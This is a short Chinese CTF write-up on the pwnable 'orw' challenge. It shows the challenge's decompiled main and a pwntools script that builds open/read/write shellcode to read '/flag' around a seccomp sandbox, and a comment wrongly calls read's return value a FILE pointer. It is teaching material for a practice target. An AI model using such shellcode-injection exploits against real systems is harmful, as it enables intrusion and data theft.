ORW

知道了沙箱和绕过的基本思路，就可以实操练一下。

*sample : orw *

这里的例题是pwnable的orw（BUU上有）。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

开启了沙箱，程序直接读取并执行我们的shellcode。pwntools中的shellcraft可以让我们不用手撕汇编，加快A题速度。

from pwn import *
context.binary = './orw'

p = process('./orw')
#p = remote('node4.buuoj.cn',25009)

shellcode = shellcraft.open('/flag')#你得知道flag的所在位置，多试几个常见位置
shellcode += shellcraft.read('eax','esp',100)#read的返回值（flag的FILE指针）存在eax里
shellcode += shellcraft.write(1,'esp',20)
shellcode = asm(shellcode)#汇编
p.sendlineafter(':',shellcode)

p.interactive()

事实上，shellcraft可以胜任绝大部分需要手撕汇编的活。（包括切换架构等，所以要注意沙箱是否有对架构的限制。

这里只是一个入门的演示，比赛中遇到的可以参考rctf_2019_babyheap